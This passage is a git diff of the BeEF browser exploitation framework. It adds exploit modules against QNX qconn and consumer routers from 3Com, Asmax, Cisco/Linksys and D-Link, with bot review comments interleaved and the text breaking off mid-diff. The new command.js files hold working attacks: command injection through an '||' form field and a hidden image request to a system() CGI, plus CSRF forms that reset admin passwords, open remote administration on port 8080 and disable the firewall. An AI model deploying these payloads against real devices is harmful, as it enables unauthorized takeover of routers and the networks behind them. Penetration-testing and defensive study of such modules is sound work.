file mode 100644 index 000000000..9b54ea8fa --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/config.yaml 
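Review bot: `timeout` reaches `setTimeout("cleanup()", timeout*1000)` without the numeric check that `rport` gets, so a non-numeric value gives NaN and the cleanup fires immediately. Add `if (isNaN(timeout) || timeout < 0) { ... return; }` next to the port checks, reporting through the same `fail=` channel. The `try` labelled "validate payload" wraps only a string assignment and a concatenation, neither of which can throw, so the `fail=malformed payload` branch is unreachable and the comment overstates what is validated. Either drop the block or reword the comment to `// build payload`.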
@@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + qnx_qconn_command_execution: + enable: true + category: "Exploits" + name: "QNX QCONN Command Execution" + description: "This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.

The results of the commands are not returned to BeEF." + authors: ["bcoles"] + target: + working: ["FF", "C", "O"] + not_working: ["S", "IE"] diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb new file mode 100644 index 000000000..3a9e14124 --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/module.rb @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Qnx_qconn_command_execution < BeEF::Core::Command + + def self.options + return [ + {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'}, + {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '8000'}, + {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'}, + {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'(echo Welcome to BeEF!) > /etc/motd', 'width'=>'200px' }, + ] + end + + def post_execute + save({'result' => @datastore['result']}) if not @datastore['result'].nil? + save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil? + end + +end diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js new file mode 100644 index 000000000..2c714f1c2 --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js 
@@ -0,0 +1,26 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var gateway = '<%= @base %>'; + var path = 'utility.cgi'; + var cmd = '<%= @cmd %>'; + + var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ + {'type':'hidden', 'name':'testType', 'value':'1'}, + {'type':'hidden', 'name':'IP', 'value':'||'+cmd} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(com_officeconnect_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml new file mode 100644 index 000000000..6dfcb5a88 --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + com_officeconnect_cmd_exec: + enable: true + category: ["Exploits", "Router"] + name: "3COM OfficeConnect Command Execution" + description: "Attempts to execute arbitrary commands on a 3Com OfficeConnect ADSL Wireless 11g Firewall Router (OSVDB# 66232).
For more information see, http://www.andreafabrizi.it/?exploits:3com_officeconnect" + authors: ["bcoles", "Andrea Fabrizi"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb new file mode 100644 index 000000000..b393df84c --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Com_officeconnect_cmd_exec < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js new file mode 100644 index 000000000..3b2bd4cf8 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js @@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var gateway = '<%= @base %>'; + var path = 'cgi-bin/script?system%20'; + var cmd = '<%= @cmd %>'; + + var img = new Image(); + img.setAttribute("style","visibility:hidden"); + img.setAttribute("width","0"); + img.setAttribute("height","0"); + img.id = 'asmax_ar804gu'; + img.src = gateway+path+cmd; + document.body.appendChild(img); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(img); + } + setTimeout("cleanup()", 15000); + +}); + 
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml new file mode 100644 index 000000000..27dd2f6c7 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + asmax_ar804gu_cmd_exec: + enable: true + category: ["Exploits", "Router"] + name: "Asmax AR-804gu Command Execution" + description: "Attempts to execute arbitrary commands on a Asmax AR-804gu (OSVDB# 54895).
For more information see, http://www.securitum.pl/dh/asmax-ar-804-gu-compromise" + authors: ["bcoles", "Michal Sajdak"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb new file mode 100644 index 000000000..71d437a74 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Asmax_ar804gu_cmd_exec < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js index d20374dbe..a95814ee7 100644 --- a/modules/exploits/router/bt_home_hub_csrf/command.js +++ b/modules/exploits/router/bt_home_hub_csrf/command.js 
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var gateway = '<%= @base %>';
 var passwd = '<%= @password %>';
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 39034eba7..22f169ec0 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb
index a63a69876..6f68fe9c8 100644
--- a/modules/exploits/router/bt_home_hub_csrf/module.rb
+++ b/modules/exploits/router/bt_home_hub_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Bt_home_hub_csrf < BeEF::Core::Command
 
diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js
new file mode 100644
index 000000000..bff4d2a4b
--- /dev/null
+++ b/modules/exploits/router/cisco_e2400_csrf/command.js
@@ -0,0 +1,68 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 'name':'submit_button', 'value':'Management'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'0'}, + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'1'}, + {'type':'hidden', 'name':'ctm404_enable', 'value':''}, + {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'wait_time', 'value':'4'}, + {'type':'hidden', 'name':'need_reboot', 'value':'0'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm','value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'_https_enable', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, + {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':'8080'}, + {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, + {'type':'hidden', 'name':'ctf_disable', 'value':'0'}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'upnp_config', 'value':'0'}, + {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, + ]); + + var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 
'name':'submit_button', 'value':'Firewall'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'block_wan', 'value':'0'}, + {'type':'hidden', 'name':'block_loopback', 'value':'0'}, + {'type':'hidden', 'name':'multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ident_pass', 'value':'0'}, + {'type':'hidden', 'name':'block_cookie', 'value':'0'}, + {'type':'hidden', 'name':'block_java', 'value':'0'}, + {'type':'hidden', 'name':'block_proxy', 'value':'0'}, + {'type':'hidden', 'name':'block_activex', 'value':'0'}, + {'type':'hidden', 'name':'wait_time', 'value':'3'}, + {'type':'hidden', 'name':'ipv6_filter', 'value':'off'}, + {'type':'hidden', 'name':'filter', 'value':'off'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(cisco_e2400_iframe1); + document.body.removeChild(cisco_e2400_iframe2); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml new file mode 100644 index 000000000..c9be4d3ea --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cisco_e2400_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Cisco E2400 CSRF" + description: "Attempts to enable remote administration on HTTPS port 443, disable the firewall, and change the password on a Cisco/Linksys E2400 router." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] 
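Review bot: The `description` in cisco_e2400_csrf/config.yaml does not match the fields submitted by command.js in this commit. It promises remote administration "on HTTPS port 443", but the form posts `http_wanport` as `8080` and no field visibly sets 443; how the router interprets these fields is not visible here, so confirm which port is exposed. The form also sets `remote_upgrade`, `remote_ip_any` and `upnp_enable` to `1`, which the description does not mention. Anyone assessing what the module changes on a device relies on this text, so add a line such as `# Also sets remote_upgrade, remote_ip_any and upnp_enable to 1 (see command.js)` and correct the port wording.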
diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb
new file mode 100644
index 000000000..418b654ac
--- /dev/null
+++ b/modules/exploits/router/cisco_e2400_csrf/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cisco_e2400_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.2/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index fdbedec46..47709ed73 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); - form.setAttribute('action', gateway + "/password.cgi"); + form.setAttribute('action', gateway + "password.cgi"); form.setAttribute('method', 'post'); var input = null; diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml index c579a47b9..9ad6c0ba7 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb index 13ae2bb76..1bc06fb2c 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb +++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5367_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index b6cc7ab28..4dbe00969 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js @@ -1,24 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml index 27f47c06e..192703c9b 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml 
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
index 84948985e..b22a1c9e9 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5624_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js new file mode 100644 index 000000000..ac96420c6 --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js 
@@ -0,0 +1,31 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+
+ var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+ [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
+ {'type':'hidden', 'name':'apply', 'value':'Save Settings'},
+ {'type':'hidden', 'name':'admin_name', 'value':'admin'},
+ {'type':'hidden', 'name':'admin_password1', 'value':passwd},
+ {'type':'hidden', 'name':'admin_password2', 'value':passwd},
+ {'type':'hidden', 'name':'rt_enable', 'value':'on'},
+ {'type':'hidden', 'name':'rt_enable_h', 'value':'1'},
+ {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'},
+ {'type':'hidden', 'name':'rt_port', 'value':'8080'}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(dir615_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
new file mode 100644
index 000000000..d2ba3fabf
--- /dev/null
+++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ dlink_dir_615_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "D-Link DIR-615 Password Wipe"
+ description: "Attempts to enable remote administration on port 8080 and change the admin password on a D-Link DIR-615 router."
+ authors: ["antisnatchor", "n0x00"]
+ target:
+ working: ["ALL"]
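Review bot: The `beef.net.send(..., "result=exploit attempted")` call in dlink_dir_615_csrf/command.js runs unconditionally right after the form iframe is created, so the value that module.rb later stores with `save({'result' => @datastore['result']})` records only that a request was issued, not that the device changed state. Nothing in the hunk says so, and someone reading the stored result afterwards could take it as confirmation. I would add a comment above the call: `// Sent unconditionally: records that the form was submitted, not that the router accepted it.` The same unannotated call appears in the new virgin_superhub_csrf/command.js and spring_framework_malicious_jar/command.js.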
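Review bot: The `name` in dlink_dir_615_csrf/config.yaml, "D-Link DIR-615 Password Wipe", does not match the `description`, which says the module changes the admin password and enables remote administration on port 8080. The command.js added in the same commit sets `admin_password1` and `admin_password2` to a supplied value rather than clearing them, so "wipe" understates what the module does to the device. A name that understates the effect misleads anyone reviewing which modules alter a device's exposure. I would rename it in line with the sibling module added here, for example `name: "D-Link DIR-615 CSRF"`.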
diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb
new file mode 100644
index 000000000..1c2d4313a
--- /dev/null
+++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Dlink_dir_615_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index ae1c98e23..20b7eca63 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -1,23 +1,14 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml index d7e6ace24..735bc0357 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml +++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb index 804200959..18a0c65fe 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb +++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the 